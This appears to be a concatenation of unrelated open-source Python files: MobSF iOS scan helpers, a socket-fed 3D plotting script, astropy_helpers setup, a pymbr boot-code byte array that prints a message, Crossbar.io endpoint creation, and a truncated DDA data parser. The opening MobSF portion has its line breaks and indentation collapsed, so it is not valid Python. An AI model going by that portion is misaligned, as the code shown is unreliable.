'macho_analysis': python_dict(db_entry[0].MACHO_ANALYSIS), 'ios_api': python_dict(db_entry[0].IOS_API), 'code_analysis': python_dict(db_entry[0].CODE_ANALYSIS), 'file_analysis': python_list(db_entry[0].FILE_ANALYSIS), 'libraries': python_list(db_entry[0].LIBRARIES), 'files': python_list(db_entry[0].FILES), 'urls': python_list(db_entry[0].URLS), 'domains': python_dict(db_entry[0].DOMAINS), 'emails': python_list(db_entry[0].EMAILS), 'strings': python_list(db_entry[0].STRINGS), 'firebase_urls': python_list(db_entry[0].FIREBASE_URLS), 'appstore_details': python_dict(db_entry[0].APPSTORE_DETAILS), } return context except Exception: logger.exception('Fetching from DB') def get_context_from_analysis(app_dict, info_dict, code_dict, bin_dict, all_files): """Get the context for IPA/ZIP from analysis results.""" try: context = { 'version': settings.MOBSF_VER, 'title': 'Static Analysis', 'file_name': app_dict['file_name'], 'app_name': info_dict['bin_name'], 'app_type': bin_dict['bin_type'], 'size': app_dict['size'], 'md5': app_dict['md5_hash'], 'sha1': app_dict['sha1'], 'sha256': app_dict['sha256'], 'build': info_dict['build'], 'app_version': info_dict['bundle_version_name'], 'sdk_name': info_dict['sdk'], 'platform': info_dict['pltfm'], 'min_os_version': info_dict['min'], 'bundle_id': info_dict['id'], 'bundle_url_types': info_dict['bundle_url_types'], 'bundle_supported_platforms': info_dict['bundle_supported_platforms'], 'icon_found': app_dict['icon_found'], 'info_plist': info_dict['plist_xml'], 'binary_info': bin_dict['bin_info'], 'permissions': info_dict['permissions'], 'ats_analysis': info_dict['inseccon'], 'binary_analysis': bin_dict['bin_code_analysis'], 'macho_analysis': bin_dict['checksec'], 'ios_api': code_dict['api'], 'code_analysis': code_dict['code_anal'], 'file_analysis': all_files['special_files'], 'libraries': bin_dict['libraries'], 'files': all_files['files_short'], 'urls': code_dict['urlnfile'], 'domains': code_dict['domains'], 'emails': code_dict['emailnfile'], 'strings': bin_dict['strings'], 'firebase_urls': code_dict['firebase'], 'appstore_details': app_dict['appstore'], } return context except Exception: 
logger.exception('Rendering to Template') def save_or_update(update_type, app_dict, info_dict, code_dict, bin_dict, all_files): """Save/Update an IPA/ZIP DB entry.""" try: values = { 'FILE_NAME': app_dict['file_name'], 'APP_NAME': info_dict['bin_name'], 'APP_TYPE': bin_dict['bin_type'], 'SIZE': app_dict['size'], 'MD5': app_dict['md5_hash'], 'SHA1': app_dict['sha1'], 'SHA256': app_dict['sha256'], 'BUILD': info_dict['build'], 'APP_VERSION': info_dict['bundle_version_name'], 'SDK_NAME': info_dict['sdk'], 'PLATFORM': info_dict['pltfm'], 'MIN_OS_VERSION': info_dict['min'], 'BUNDLE_ID': info_dict['id'], 'BUNDLE_URL_TYPES': info_dict['bundle_url_types'], 'BUNDLE_SUPPORTED_PLATFORMS': info_dict['bundle_supported_platforms'], 'ICON_FOUND': app_dict['icon_found'], 'INFO_PLIST': info_dict['plist_xml'], 'BINARY_INFO': bin_dict['bin_info'], 'PERMISSIONS': info_dict['permissions'], 'ATS_ANALYSIS': info_dict['inseccon'], 'BINARY_ANALYSIS': bin_dict['bin_code_analysis'], 'MACHO_ANALYSIS': bin_dict['checksec'], 'IOS_API': code_dict['api'], 'CODE_ANALYSIS': code_dict['code_anal'], 'FILE_ANALYSIS': all_files['special_files'], 'LIBRARIES': bin_dict['libraries'], 'FILES': all_files['files_short'], 'URLS': code_dict['urlnfile'], 'DOMAINS': code_dict['domains'], 'EMAILS': code_dict['emailnfile'], 'STRINGS': bin_dict['strings'], 'FIREBASE_URLS': code_dict['firebase'], 'APPSTORE_DETAILS': app_dict['appstore'], } if update_type == 'save': db_entry = StaticAnalyzerIOS.objects.filter( MD5=app_dict['md5_hash']) if not db_entry.exists(): StaticAnalyzerIOS.objects.create(**values) else: StaticAnalyzerIOS.objects.filter( MD5=app_dict['md5_hash']).update(**values) except Exception: logger.exception('Updating DB') try: values = { 'APP_NAME': info_dict['bin_name'], 'PACKAGE_NAME': info_dict['id'], 'VERSION_NAME': info_dict['bundle_version_name'], } RecentScansDB.objects.filter( MD5=app_dict['md5_hash']).update(**values) except Exception: logger.exception('Updating RecentScansDB')
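
# Illustrative call pattern (a sketch, not MobSF code; the argument is a scan
# MD5 as stored for StaticAnalyzerIOS entries):
def example_context_lookup(md5_hash):
    db_entry = StaticAnalyzerIOS.objects.filter(MD5=md5_hash)
    if db_entry.exists():
        return get_context_from_db_entry(db_entry)
    return None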
gpl-3.0
-1,673,612,552,239,371,300
41.316092
77
0.528317
false
Shatki/PyIMU
test/magnetosphere.py
1
1580
from mpl_toolkits.mplot3d import axes3d
import numpy as np
import matplotlib.pyplot as plt
from socket import *
import time

# Declare all global variables
HOST = '192.168.0.76'
PORT = 21566
BUFSIZ = 512
ADDR = (HOST, PORT)

bad_packet = 0
good_packet = 0
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')

# Socket
tcpCliSock = socket(AF_INET, SOCK_STREAM)
tcpCliSock.connect(ADDR)

# Interactive mode, so drawing does not block the loop
plt.ion()

tstart = time.time()

# real-time plotting loop
X, Y, Z = [], [], []
while True:
    try:
        # read one packet from the network
        data = tcpCliSock.recv(BUFSIZ)
        if data:
            print(len(X), data)
            fields = data.decode().split(',')
            if len(fields) == 9:
                good_packet += 1
                # plot the first three fields as x/y/z
                X.append(float(fields[0]))
                Y.append(float(fields[1]))
                Z.append(float(fields[2]))
                ax.scatter(X, Y, Z, c='b', marker='o')
                plt.pause(0.001 / len(X))
            else:
                bad_packet += 1
    except KeyboardInterrupt:
        tcpCliSock.close()
        print('FPS: %f' % (len(X) / (time.time() - tstart)))
        break
gpl-3.0
-736,870,472,682,010,900
21.328358
60
0.574866
false
embray/astropy_helpers
setup.py
1
2069
#!/usr/bin/env python # Licensed under a 3-clause BSD style license - see LICENSE.rst import ah_bootstrap import pkg_resources from setuptools import setup from astropy_helpers.setup_helpers import register_commands, get_package_info from astropy_helpers.version_helpers import generate_version_py NAME = 'astropy_helpers' VERSION = '1.1.dev' RELEASE = 'dev' not in VERSION DOWNLOAD_BASE_URL = 'http://pypi.python.org/packages/source/a/astropy-helpers' generate_version_py(NAME, VERSION, RELEASE, False, uses_git=not RELEASE) # Use the updated version including the git rev count from astropy_helpers.version import version as VERSION cmdclass = register_commands(NAME, VERSION, RELEASE) # This package actually doesn't use the Astropy test command del cmdclass['test'] setup( name=pkg_resources.safe_name(NAME), # astropy_helpers -> astropy-helpers version=VERSION, description='Utilities for building and installing Astropy, Astropy ' 'affiliated packages, and their respective documentation.', author='The Astropy Developers', author_email='[email protected]', license='BSD', url='http://astropy.org', long_description=open('README.rst').read(), download_url='{0}/astropy-helpers-{1}.tar.gz'.format(DOWNLOAD_BASE_URL, VERSION), classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'Framework :: Setuptools Plugin', 'Framework :: Sphinx :: Extension', 'Framework :: Sphinx :: Theme', 'License :: OSI Approved :: BSD License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Topic :: Software Development :: Build Tools', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: System :: Archiving :: Packaging' ], cmdclass=cmdclass, zip_safe=False, **get_package_info(exclude=['astropy_helpers.tests']) )
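
# Typical invocations of this script (illustrative):
#
#     python setup.py build    # build in place, using the generated version module
#     python setup.py sdist    # create a source distribution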
bsd-3-clause
1,800,023,496,086,649,600
38.037736
78
0.672789
false
0xGiddi/pymbr
pymbr/bootcode.py
1
1582
""" pymbr A python module to manipulate and create MBRs. :copyright: (c) 2017 by Gideon S. (0xGiddi) :license: GPLv3, see LICENSE file for more details. """ __all__ = ['Bootcode'] class Bootcode: """ Common bootcodes used by various OSes """ ZERO = [0x00] ZOIDBERG = [0xB8, 0xC0, 0x07, 0x05, 0x20, 0x01, 0x8E, 0xD0, 0xBC, 0x00, 0x10, 0xB8, 0xC0, 0x07, 0x8E, 0xD8, 0xE8, 0x8E, 0x00, 0xE8, 0xA3, 0x00, 0xBE, 0x2A, 0x00, 0xE8, 0x70, 0x00, 0xBE, 0x45, 0x00, 0xE8, 0x6A, 0x00, 0xBE, 0x6B, 0x00, 0xE8, 0x64, 0x00, 0xEB, 0xFE, 0x4E, 0x65, 0x65, 0x64, 0x20, 0x4D, 0x42, 0x52, 0x20, 0x70, 0x61, 0x72, 0x73, 0x69, 0x6E, 0x67, 0x20, 0x6D, 0x6F, 0x64, 0x75, 0x6C, 0x65, 0x3F, 0x0A, 0x0D, 0x00, 0x57, 0x68, 0x79, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x5A, 0x6F, 0x69, 0x64, 0x62, 0x65, 0x72, 0x67, 0x3F, 0x20, 0x28, 0x56, 0x56, 0x29, 0x28, 0xA7, 0x2C, 0x2C, 0x2C, 0xA7, 0x29, 0x28, 0x56, 0x56, 0x29, 0x0A, 0x0D, 0x0A, 0x0D, 0x00, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 0x2F, 0x2F, 0x67, 0x69, 0x74, 0x68, 0x75, 0x62, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x30, 0x78, 0x47, 0x69, 0x64, 0x64, 0x69, 0x2F, 0x70, 0x79, 0x6D, 0x62, 0x72, 0x00, 0xB4, 0x0E, 0xAC, 0x3C, 0x00, 0x74, 0x04, 0xCD, 0x10, 0xEB, 0xF7, 0xC3, 0x60, 0xB7, 0x00, 0xB4, 0x02, 0xCD, 0x10, 0x61, 0xC3, 0x60, 0xBA, 0x00, 0x00, 0xE8, 0xF0, 0xFF, 0xB4, 0x06, 0xB0, 0x00, 0xB7, 0x0C, 0xB9, 0x00, 0x00, 0xB6, 0x18, 0xB2, 0x4F, 0xCD, 0x10, 0x61, 0xC3, 0x60, 0xB5, 0x20, 0xB4, 0x01, 0xB0, 0x03, 0xCD, 0x10, 0x61, 0xC3] # TODO: Add here popular OSes MBRs
gpl-3.0
-8,665,105,640,867,427,000
51.733333
108
0.628951
false
GoodgameStudios/crossbar
crossbar/twisted/endpoint.py
1
12193
##################################################################################### # # Copyright (C) Tavendo GmbH # # Unless a separate license agreement exists between you and Tavendo GmbH (e.g. you # have purchased a commercial license), the license terms below apply. # # Should you enter into a separate license agreement after having received a copy of # this software, then the terms of such license agreement replace the terms below at # the time at which such license agreement becomes effective. # # In case a separate license agreement ends, and such agreement ends without being # replaced by another separate license agreement, the license terms below apply # from the time at which said agreement ends. # # LICENSE TERMS # # This program is free software: you can redistribute it and/or modify it under the # terms of the GNU Affero General Public License, version 3, as published by the # Free Software Foundation. This program is distributed in the hope that it will be # useful, but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # # See the GNU Affero General Public License Version 3 for more details. # # You should have received a copy of the GNU Affero General Public license along # with this program. If not, see <http://www.gnu.org/licenses/agpl-3.0.en.html>. # ##################################################################################### from __future__ import absolute_import import os from twisted.internet import defer from twisted.internet.endpoints import TCP4ServerEndpoint, \ TCP6ServerEndpoint, \ TCP4ClientEndpoint, \ TCP6ClientEndpoint, \ UNIXServerEndpoint, \ UNIXClientEndpoint from twisted.python.compat import unicode try: from twisted.internet.endpoints import SSL4ServerEndpoint, \ SSL4ClientEndpoint from crossbar.twisted.tlsctx import TlsServerContextFactory, \ TlsClientContextFactory except ImportError: _HAS_TLS = False else: _HAS_TLS = True from crossbar.twisted.sharedport import SharedPort __all__ = ('create_listening_endpoint_from_config', 'create_listening_port_from_config', 'create_connecting_endpoint_from_config', 'create_connecting_port_from_config') def create_listening_endpoint_from_config(config, cbdir, reactor): """ Create a Twisted stream server endpoint from a Crossbar.io transport configuration. See: https://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IStreamServerEndpoint.html :param config: The transport configuration. :type config: dict :param cbdir: Crossbar.io node directory (we need this for TLS key/certificates). :type cbdir: str :param reactor: The reactor to use for endpoint creation. :type reactor: obj :returns obj -- An instance implementing IStreamServerEndpoint """ endpoint = None # a TCP endpoint # if config['type'] == 'tcp': # the TCP protocol version (v4 or v6) # version = int(config.get('version', 4)) # the listening port # if type(config['port']) in (str, unicode): # read port from environment variable .. 
try: port = int(os.environ[config['port'][1:]]) except Exception as e: print("Could not read listening port from env var: {}".format(e)) raise e else: port = config['port'] # the listening interface # interface = str(config.get('interface', '').strip()) # the TCP accept queue depth # backlog = int(config.get('backlog', 50)) if 'tls' in config: if _HAS_TLS: key_filepath = os.path.abspath(os.path.join(cbdir, config['tls']['key'])) cert_filepath = os.path.abspath(os.path.join(cbdir, config['tls']['certificate'])) with open(key_filepath) as key_file: with open(cert_filepath) as cert_file: if 'dhparam' in config['tls']: dhparam_filepath = os.path.abspath(os.path.join(cbdir, config['tls']['dhparam'])) else: dhparam_filepath = None # create a TLS context factory # key = key_file.read() cert = cert_file.read() ciphers = config['tls'].get('ciphers', None) ctx = TlsServerContextFactory(key, cert, ciphers=ciphers, dhParamFilename=dhparam_filepath) # create a TLS server endpoint # if version == 4: endpoint = SSL4ServerEndpoint(reactor, port, ctx, backlog=backlog, interface=interface) elif version == 6: raise Exception("TLS on IPv6 not implemented") else: raise Exception("invalid TCP protocol version {}".format(version)) else: raise Exception("TLS transport requested, but TLS packages not available") else: # create a non-TLS server endpoint # if version == 4: endpoint = TCP4ServerEndpoint(reactor, port, backlog=backlog, interface=interface) elif version == 6: endpoint = TCP6ServerEndpoint(reactor, port, backlog=backlog, interface=interface) else: raise Exception("invalid TCP protocol version {}".format(version)) # a Unix Domain Socket endpoint # elif config['type'] == 'unix': # the accept queue depth # backlog = int(config.get('backlog', 50)) # the path # path = os.path.abspath(os.path.join(cbdir, config['path'])) # create the endpoint # endpoint = UNIXServerEndpoint(reactor, path, backlog=backlog) else: raise Exception("invalid endpoint type '{}'".format(config['type'])) return endpoint def create_listening_port_from_config(config, factory, cbdir, reactor): """ Create a Twisted listening port from a Crossbar.io transport configuration. See: https://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IListeningPort.html :param config: The transport configuration. :type config: dict :param factory: The transport factory to use (a provider of IProtocolFactory). :type factory: obj :param cbdir: Crossbar.io node directory (we need this for TLS key/certificates). :type cbdir: str :param reactor: The reactor to use for endpoint creation. :type reactor: obj :returns obj -- A Deferred that results in an IListeningPort or an CannotListenError """ if config['type'] == 'tcp' and config.get('shared', False): # the TCP protocol version (v4 or v6) # FIXME: handle v6 # version = int(config.get('version', 4)) # the listening port # port = int(config['port']) # the listening interface # interface = str(config.get('interface', '').strip()) # the TCP accept queue depth # backlog = int(config.get('backlog', 50)) listening_port = SharedPort(port, factory, backlog, interface, reactor, shared=True) try: listening_port.startListening() return defer.succeed(listening_port) except Exception as e: return defer.fail(e) else: endpoint = create_listening_endpoint_from_config(config, cbdir, reactor) return endpoint.listen(factory) def create_connecting_endpoint_from_config(config, cbdir, reactor): """ Create a Twisted stream client endpoint from a Crossbar.io transport configuration. 
See: https://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IStreamClientEndpoint.html :param config: The transport configuration. :type config: dict :param cbdir: Crossbar.io node directory (we need this for Unix domain socket paths and TLS key/certificates). :type cbdir: str :param reactor: The reactor to use for endpoint creation. :type reactor: obj :returns obj -- An instance implementing IStreamClientEndpoint """ endpoint = None # a TCP endpoint # if config['type'] == 'tcp': # the TCP protocol version (v4 or v6) # version = int(config.get('version', 4)) # the host to connect to # host = str(config['host']) # the port to connect to # port = int(config['port']) # connection timeout in seconds # timeout = int(config.get('timeout', 10)) if 'tls' in config: if _HAS_TLS: ctx = TlsClientContextFactory() # create a TLS client endpoint # if version == 4: endpoint = SSL4ClientEndpoint(reactor, host, port, ctx, timeout=timeout) elif version == 6: raise Exception("TLS on IPv6 not implemented") else: raise Exception("invalid TCP protocol version {}".format(version)) else: raise Exception("TLS transport requested, but TLS packages not available") else: # create a non-TLS client endpoint # if version == 4: endpoint = TCP4ClientEndpoint(reactor, host, port, timeout=timeout) elif version == 6: endpoint = TCP6ClientEndpoint(reactor, host, port, timeout=timeout) else: raise Exception("invalid TCP protocol version {}".format(version)) # a Unix Domain Socket endpoint # elif config['type'] == 'unix': # the path # path = os.path.abspath(os.path.join(cbdir, config['path'])) # connection timeout in seconds # timeout = int(config.get('timeout', 10)) # create the endpoint # endpoint = UNIXClientEndpoint(reactor, path, timeout=timeout) else: raise Exception("invalid endpoint type '{}'".format(config['type'])) return endpoint def create_connecting_port_from_config(config, factory, cbdir, reactor): """ Create a Twisted connecting port from a Crossbar.io transport configuration. See: https://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IListeningPort.html :param config: The transport configuration. :type config: dict :param factory: The transport factory to use (a provider of IProtocolFactory). :type factory: obj :param cbdir: Crossbar.io node directory (we need this for Unix domain socket paths and TLS key/certificates). :type cbdir: str :param reactor: The reactor to use for endpoint creation. :type reactor: obj :returns obj -- A Deferred that results in an IProtocol upon successful connection otherwise a ConnectError """ endpoint = create_connecting_endpoint_from_config(config, cbdir, reactor) return endpoint.connect(factory)
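
# A minimal configuration sketch (illustrative; the port and interface values
# are placeholders). The keys mirror those consumed by
# create_listening_endpoint_from_config() above.
def example_tcp_listening_endpoint(reactor, cbdir):
    config = {
        'type': 'tcp',
        'port': 8080,
        'interface': '127.0.0.1',
        'backlog': 50,
    }
    return create_listening_endpoint_from_config(config, cbdir, reactor)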
agpl-3.0
7,831,824,093,298,299,000
34.444767
115
0.567129
false
lainegates/DDA
loadDataTools.py
1
41566
# coding=gbk #*************************************************************************** #* * #* Copyright (c) 2009, 2010 * #* Xiaolong Cheng <[email protected]> * #* * #* This program is free software; you can redistribute it and/or modify * #* it under the terms of the GNU Lesser General Public License (LGPL) * #* as published by the Free Software Foundation; either version 2 of * #* the License, or (at your option) any later version. * #* for detail see the LICENCE text file. * #* * #* This program is distributed in the hope that it will be useful, * #* but WITHOUT ANY WARRANTY; without even the implied warranty of * #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * #* GNU Library General Public License for more details. * #* * #* You should have received a copy of the GNU Library General Public * #* License along with this program; if not, write to the Free Software * #* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 * #* USA * #* * #*************************************************************************** import FreeCADGui from PyQt4 import QtCore , QtGui import Base from Base import showErrorMessageBox import DDADatabase def checkFileExists(path): import os if not os.path.isfile(path): showErrorMessageBox("FileError" , "File \"%s\" doesn't exist"%path) return False return True class FileReader(): ''' read files , this class will omit the blank lines ''' def __init__(self): self.__fileName = None self.__file = None def setFile(self, fileName): self.__fileName = fileName try: self.__file = open(self.__fileName , 'rb') except: showErrorMessageBox('file open error' , fileName + ' open failed') return False return True def getNextLine(self): line = self.__file.readline() while len(line)!=0: line = line.strip() if len(line)==0: # blank line with '\n' line = self.__file.readline() else: break # this line is not blank if len(line)==0: # file already ends import Base Base.showErrorMessageBox('file error' , 'unvalid data') raise return line def closeFile(self): self.__file.close() class Block: def __init__(self): self.blockIndex = 0 # the index of this block self.startNo = 0 self.endNo = 0 self.vertices = [] self.parameters = [] self.stressX = 0 self.stressY = 0 self.stressXY = 0 self.materialNo = 0 # used in dc result # count how many hole points are on this block self.holePointsCount = 0 def getPoints(self): return [(t[1],t[2],0) for t in self.vertices] def visible(self): if self.holePointsCount>0: return False elif self.holePointsCount==0: return True else : raise Exception('unvalid value %f'% self.holePointsCount) class DDALine: def __init__(self , p1 , p2 , materialNo): self.startPoint = p1 self.endPoint = p2 self.materialNo = materialNo self.visible = True class BoltElement(DDALine): def __init__(self , p1 , p2 , e , t , f): DDALine.__init__(self, p1, p2, 0) self.e = e self.t = t self.f = f class DDAPolyLine: def __init__(self , pts , materialNo): self.pts = pts self.materialNo = materialNo self.visible = True class DDAPoint: def __init__(self , x=0 , y=0): self.x = x self.y = y self.Xspeed = 0 self.Yspeed = 0 self.blockNo = 0 self.visible = True class FixedPoint(DDAPoint): pass class LoadingPoint(DDAPoint): pass class MeasuredPoint(DDAPoint): def __init__(self): DDAPoint.__init__(self) self.u = 0 self.v = 0 self.r = 0 self.stressX = 0 self.stressY = 0 self.stressXY = 0 class HolePoint(DDAPoint): pass class Graph: def __init__(self): self.blocks = [] self.fixedPoints = [] self.measuredPoints = [] self.loadingPoints = [] self.holePoints = [] 
self.boltElements = [] def reset(self): self.blocks = [] self.fixedPoints = [] self.measuredPoints = [] self.loadingPoints = [] self.boltElements = [] class BaseParseData(): ''' parse data loaded , data may be DL data , DC data etc. ''' def parse(self , filename): ''' abstract function , overwrited by subclass ''' pass def parseFloatNum(self , numStr , itemName='None'): try: num = float(numStr) except: try: num = int(numStr) except: showErrorMessageBox( 'InputError' , itemName + ' should be a float number') return None return num def parseIntNum(self , numStr , itemName='None'): try: num = int(numStr) except: showErrorMessageBox( 'InputError' , itemName + ' should be a integer') return None return num class ParseAndLoadDLData(BaseParseData): ''' parse DL data ''' def __init__(self): self.reset() self.__fileReader = FileReader() def GetResources(self): return { 'Pixmap' : 'LoadDLInput', 'MenuText': 'LoadDCInputData', 'ToolTip': "Load DC Input Data"} def Activated(self): from Base import __currentProjectPath__ if self.parse(__currentProjectPath__ + '/data.dl'): self.save2Database() import Base Base.changeStep4Stage('ShapesAvailable') def reset(self): self.checkStatus = False self.__miniLength = 0 self.__jointSetNum = 0 self.__boundaryNodeNum = 0 self.__tunnelNum = 0 self.__addtionalLineNum = 0 self.__materialLineNum = 0 self.__boltElementNum = 0 self.__fixedPointNum = 0 self.__loadingPointNum = 0 self.__measuredPointNum = 0 self.__holePointNum = 0 self.__jointSets = [] self.__slope = [] self.__boundaryNodes = [] self.__tunnels = [] self.__additionalLines = [] self.__materialLines = [] self.__boltElements = [] self.__fixedPoints = [] self.__loadingPoints = [] self.__measuredPoints = [] self.__holePoints = [] def parse(self , filename ): ''' parse DL data :param filename: the data file name ''' self.reset() if not self.__fileReader.setFile(filename): return False if not self.__parsePandect(): return False if not self.__parseJointSets(): return False if not self.__parseBoundaryNodes(): return False if not self.__parseTunnels(): return False if not self.__parseLines(): return False if not self.__parsePoints(): return False self.__fileReader.closeFile() return True def __parseJointSets(self): ''' parse joint sets ''' # joint dip , dip direction for i in range(self.__jointSetNum): self.__jointSets.append(range(6)) tmpNums = self.__jointSets[-1] str = self.__fileReader.getNextLine() nums = str.strip().split() tmpNums[0] = self.parseFloatNum(nums[0], 'joint dip') tmpNums[1] = self.parseFloatNum(nums[1], 'dip direction') if tmpNums[0] == None or tmpNums[1] == None : return False print 'joint %d : ( %f , %f)'%( i , tmpNums[0],tmpNums[1]) # slope dip , dip direction tmpNumbers = [0 , 1] str = self.__fileReader.getNextLine() nums = str.strip().split() tmpNumbers[0] = self.parseFloatNum(nums[0], 'slope dip') tmpNumbers[1] = self.parseFloatNum(nums[1], 'dip direction') if tmpNumbers[0] == None or tmpNumbers[1] == None : return False print 'slope : ( %f , %f)'%(tmpNumbers[0],tmpNumbers[1]) self.__slope.append((tmpNumbers[0],tmpNumbers[1])) for i in range(self.__jointSetNum): tmpNums = self.__jointSets[i] str = self.__fileReader.getNextLine() nums = str.strip().split() tmpNums[2] = self.parseFloatNum(nums[0], 'spacing') tmpNums[3] = self.parseFloatNum(nums[1], 'length') tmpNums[4] = self.parseFloatNum(nums[2], 'bridge') tmpNums[5] = self.parseFloatNum(nums[3], 'random') if tmpNums[2] == None or tmpNums[3] == None or tmpNums[4] == None or tmpNums[5] == None : return False print 'joint %d parameter : ( %f , 
%f , %f , %f)'%(i , tmpNums[2],tmpNums[3],tmpNums[4],tmpNums[5])
        return True

    def __parseBoundaryNodes(self ):
        '''
        parse boundary nodes
        '''
        for i in range(self.__boundaryNodeNum):
            str = self.__fileReader.getNextLine()
            nums = str.strip().split()
            tmpNums = [0 , 1 , 0]
            tmpNums[0] = self.parseFloatNum(nums[0], 'coordinate number')
            tmpNums[1] = self.parseFloatNum(nums[1], 'coordinate number')
            if tmpNums[0] == None or tmpNums[1] == None : return False
            print 'boundary line %d : (%f , %f)'%(i , tmpNums[0] , tmpNums[1])
            self.__boundaryNodes.append(tmpNums)
        return True

    def __parseTunnels(self ):
        '''
        parse tunnels
        '''
        for i in range(self.__tunnelNum):
            # tunnel shape number
            str = self.__fileReader.getNextLine()
            shapeNo = self.parseIntNum(str, 'tunnel shape number')
            if shapeNo == None : return False

            # tunnel a b c r
            tmpNums = range(4)
            str = self.__fileReader.getNextLine()
            names = ['a' , 'b' , 'c' , 'r']
            nums = str.strip().split()
            for j in range(4):
                tmpNums[j] = self.parseFloatNum(nums[j], 'tunnel ' +names[j])
                if tmpNums[j] == None : return False

            # tunnel center
            center = [0 , 1]
            str = self.__fileReader.getNextLine()
            nums = str.strip().split()
            for j in range(2):
                center[j] = self.parseFloatNum(nums[j], 'tunnel center number')
                if center[j] == None : return False
            print 'tunnel %d : (%f , %f , %f , %f , %f , %f , %f)'%(i , shapeNo , tmpNums[0] , tmpNums[1] , tmpNums[2] , tmpNums[3] , center[0] , center[1])
            self.__tunnels.append((shapeNo , tmpNums[0] , tmpNums[1] , tmpNums[2] , tmpNums[3] , center[0] , center[1]))
        return True

    def __parseLines(self ):
        '''
        parse material lines , additional lines
        '''
        tmpNums = range(4)
        # additional line
        for i in range(self.__addtionalLineNum):
            str = self.__fileReader.getNextLine()
            nums = str.strip().split()
            for j in range(4):
                tmpNums[j] = self.parseFloatNum(nums[j], 'additional line coordinate number')
                if tmpNums[j] == None : return False
            materialNo = self.parseFloatNum(nums[4], 'additional line material number')
            if materialNo == None : return False
            print 'additional line %d :(%f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo)
            self.__additionalLines.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo))

        # material line
        for i in range(self.__materialLineNum):
            str = self.__fileReader.getNextLine()
            nums = str.strip().split()
            for j in range(4):
                tmpNums[j] = self.parseFloatNum(nums[j], 'material line coordinate number')
                if tmpNums[j] == None : return False
            materialNo = self.parseFloatNum(nums[4], 'block material number')
            if materialNo == None : return False
            print 'block material %d :(%f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo)
            self.__materialLines.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo))

        # bolt elements
        for i in range(self.__boltElementNum):
            str = self.__fileReader.getNextLine()
            nums = str.strip().split()
            for j in range(4):
                tmpNums[j] = self.parseFloatNum(nums[j], 'bolt element coordinate number')
                if tmpNums[j] == None : return False
            e0 = self.parseFloatNum(nums[4], 'bolt element e0')
            t0 = self.parseFloatNum(nums[5], 'bolt element t0')
            f0 = self.parseFloatNum(nums[6], 'bolt element f0')
            if e0 == None or t0 == None or f0 == None : return False
            print 'bolt element %d :(%f , %f , %f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0)
            self.__boltElements.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0))
        return True

    def __parsePoints(self):
        '''
        parse points , fixed points , loading points , measured points , 
hole points :param file: input dl file ''' tmpNums = range(4) # fixed points for i in range(self.__fixedPointNum): str = self.__fileReader.getNextLine() nums = str.strip().split() for j in range(4): tmpNums[j] = self.parseFloatNum(nums[j], 'fixed point coordinate number') if tmpNums[j] == None : return False print 'fixed line %d : (%f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3]) self.__fixedPoints.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3])) # measured points itemNames = ['loading point' , 'measured point' , 'hole point'] realNums = [self.__loadingPointNum , self.__measuredPointNum , self.__holePointNum] for k in range(len(itemNames)): for i in range(realNums[k]): str = self.__fileReader.getNextLine() nums = str.strip().split() for j in range(2): tmpNums[j] = self.parseFloatNum(nums[j], itemNames[k] +' coordinate number') if tmpNums[j] == None : return False print '%s %d : (%f , %f)'%(itemNames[k] , i , tmpNums[0] , tmpNums[1]) if k==0 : self.__loadingPoints.append((tmpNums[0] , tmpNums[1])) elif k==1 : self.__measuredPoints.append((tmpNums[0] , tmpNums[1])) elif k==2 : self.__holePoints.append((tmpNums[0] , tmpNums[1])) return True def __parsePandect(self): ''' parse Numbers , for example , number of joint set ''' self.__miniLength = self.parseFloatNum(self.__fileReader.getNextLine(), 'minimun edge length') if self.__miniLength == None : return False self.__jointSetNum = self.parseIntNum(self.__fileReader.getNextLine(), 'joint set number') if self.__jointSetNum == None: return False self.__boundaryNodeNum = self.parseIntNum(self.__fileReader.getNextLine(), 'boundary line number') if self.__boundaryNodeNum == None: return False self.__tunnelNum = self.parseIntNum(self.__fileReader.getNextLine(), 'tunnel number') if self.__tunnelNum == None: return False self.__addtionalLineNum = self.parseIntNum(self.__fileReader.getNextLine(), 'additional line number') if self.__addtionalLineNum == None: return False self.__materialLineNum = self.parseIntNum(self.__fileReader.getNextLine(), 'material line number') if self.__materialLineNum == None: return False self.__boltElementNum = self.parseIntNum(self.__fileReader.getNextLine(), 'bolt element number') if self.__boltElementNum == None: return False self.__fixedPointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'fixed point number') if self.__fixedPointNum == None: return False self.__loadingPointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'loading point number') if self.__loadingPointNum == None: return False self.__measuredPointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'measured point number') if self.__measuredPointNum == None: return False self.__holePointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'hole point number') if self.__holePointNum == None: return False return True def save2Database(self): ''' save data to DDADatabase.dl_database ''' from DDAShapes import DDAJointSets , DDATunnels DDADatabase.dl_database = DDADatabase.DLDatabase() database = DDADatabase.dl_database database.jointSets = self.__jointSets 